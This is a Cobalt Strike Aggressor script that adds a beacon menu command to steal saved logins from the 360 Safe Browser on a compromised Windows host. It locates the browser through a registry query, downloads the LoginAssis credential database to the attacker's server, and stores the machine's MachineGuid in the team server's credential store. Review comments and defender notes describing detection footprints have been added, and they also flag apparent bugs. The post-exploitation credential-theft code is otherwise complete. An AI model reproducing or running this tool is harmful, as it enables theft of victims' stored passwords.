360SafeBrowsergetpass.cna
#author=haya
# Tasks the beacon passed as $1 to read the MachineGuid value under
# HKLM\SOFTWARE\Microsoft\Cryptography. Nothing is returned to the caller; the
# value arrives later as beacon output and is parsed by the beacon_output
# handler in this file.
# Defender note: a read of this value close in time to a query of the
# 360seURL open command is the registry footprint of this script.
sub getMachineGuid{
# $arch is not declared local, so it is shared script-wide state.
$arch = barch($1);
# NOTE(review): `==` is Sleep's numeric comparison (string equality is `eq`),
# so the branch taken may not follow the architecture string - confirm before
# inferring from this structure which registry view was queried.
if ($arch == 'x64'){
# Single query against the 64-bit registry view.
breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
}
else{
# Queries both the 32-bit and the 64-bit view of the same value.
breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x86");
breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
}
}
# Runs a shell command on the beacon that prints the 360seURL protocol
# handler's open command, filtered to lines containing "exe". The
# beacon_output handler in this file derives the browser's install path from
# that output.
# The sub reads the global $bid rather than its own argument $1, so it depends
# on the caller having set $bid first.
# Defender note: the command line below (reg query of
# HKEY_CLASSES_ROOT\360seURL\shell\open\command piped to findstr) is a stable
# string to look for in process-creation telemetry.
sub SafeBrowsergetpass {
bshell($bid, 'reg query HKEY_CLASSES_ROOT\360seURL\shell\open\command|findstr exe');
}
# Adds a "SafeBrowsergetpass" entry to the beacon_bottom popup menu. Selecting
# it issues both tasks: the install-path query and the MachineGuid query.
popup beacon_bottom {
item "SafeBrowsergetpass"{
# $bid is a global and is what SafeBrowsergetpass actually uses.
# NOTE(review): the meaning of the '@' index on $1 is not evident from this
# file - confirm what value ends up in $bid.
$bid = $1['@'];
SafeBrowsergetpass($bid);
getMachineGuid($bid);
}
}
# Handler for beacon output ($1 is used as the beacon id, $2 as the output
# text). It is not tied to the tasks issued by this script: any output
# containing either marker string below triggers the matching branch.
# Defender note: the artefacts produced here are a download of
# "...\User Data\Default\apps\LoginAssis\assis2.db" from the browser's install
# directory and a MachineGuid entry in the team server's credential store.
# If this activity is observed, treat the logins saved in that browser profile
# as exposed.
on beacon_output {
# Markers used to recognise the output of the two tasks issued by the menu item.
$magicstring = "360se6\\Application\\360se.exe";
$magicstring2 = "MachineGuid";
if ($magicstring isin $2){
$length = strlen($2);
# Start one character before the last ':' in the output (presumably the drive
# letter) and stop at a fixed offset from the end.
# NOTE(review): the constant 32 assumes a fixed-length tail after the install
# directory - confirm against real output.
$last = lindexOf($2, ":");
$res = substr($2, $last - 1, $length - 32);
# Append the relative path of the database file to the derived directory.
$dbPath = "User Data\\Default\\apps\\LoginAssis\\assis2.db";
$res = $res . $dbPath;
# The path handed to bdownload is built from output text with no validation.
bdownload($1, $res);
blog($1,"360 SafeBrowser DB Downloading");
}
if ($magicstring2 isin $2){
# Take the text starting 26 characters after the last "\nMachineGuid" match.
# NOTE(review): the offset presumably skips the value name and type columns
# of the query output - confirm; the -1 end index is as written by the author.
$lasta = lindexOf($2, "\nMachineGuid");
$MachineGuid = substr($2, $lasta + 26, -1);
$beaconHost = beacon_info($1, "host");
# $empty is never assigned in this file. The extracted GUID is passed as the
# second argument and the beacon's host as the last.
credential_add($empty,$MachineGuid, $empty, $empty, $beaconHost);
blog($1,"MachineGuid Get Success");
}
}